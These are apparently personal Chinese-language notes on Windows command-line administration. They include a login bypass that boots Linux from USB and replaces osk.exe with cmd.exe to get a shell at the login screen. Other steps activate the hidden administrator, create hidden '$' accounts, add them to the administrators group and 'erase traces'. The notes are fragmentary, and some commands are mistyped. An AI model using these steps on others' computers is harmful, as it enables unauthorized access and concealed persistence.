net user
net user administrator /active:yes
net user administrator 123(password)
logoff
net user hackm 123(password)
的方式修改密码net user hackm /del
。通常注册一个用户,然后激活超级管理员、使用超级管理员登录电脑、再删除注册用户,使得你的权限为超级管理员权限。从删除上图可以看出,
Administrtor
是超级管理员,DefaultAccount、WDAGUtilityAccount
是系统默认用户,Guest
是来宾用户,hackm
是注册用户。
7. 使用组策略修改超级管理员的名字,在cmd中输入gpedit.msc
在BIOS中使用USB中的系统启动boot;
查看物理机中的磁盘情况:fdisk -l
linux下安装windows,会自动安装100M的EFI system和16M的分区,
Microsoft basic data
分区就是windows的系统盘。
使用mount
将windows系统盘挂载到mnt
目录下:mount <分区路径> /mnt
,mnt
目录常用来挂载硬盘或者分区的临时目录。
将osk.exe替换为cmd.exe,osk.exe就是登陆时候可以调用的屏幕键盘。
打开屏幕键盘
,将会调用命令行。
之后激活administrator
用户,并设置其密码,再使用超级管理员登录电脑即可。
删除痕迹:
net user administrator /active:no
;在windows下,查看DNS服务器:ipconfig /all
powershell下,查看盘符:get-psdrive
查看指定进程(powershell):Get-Process -Name <指定进程名>
打开远程桌面的命令,命令行输入:mstsc
或者直接搜索远程桌面
在powershell中使用
del
命令不一定有效,可以试试cmd中使用del
:
windows下查询注册表值:
Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name 'fSingleSessionPerUser'
reg query "hklm\\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser
设置windows下多session登录:
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name 'fSingleSessionPerUser' -value '0'
reg add "hklm\\SYSTEM\CurrentControlSet\Control\Terminal Server" /t REG_DWORD /v fSingleSessionPerUser /d 0
windows下创建隐藏用户:net user <用户名>$ <密码> /add
。例如:nett user hackmm$ hackmm /add
windows下创建超级用户,其实就是将普通用户放到超级管理员组中,具体命令:net localgroup administrator hackmm$ /add
windows关闭进程:
taskkill /im <需要删除的进程PID> /F
ps -name <需要删除的进程名> | Stop-Process -force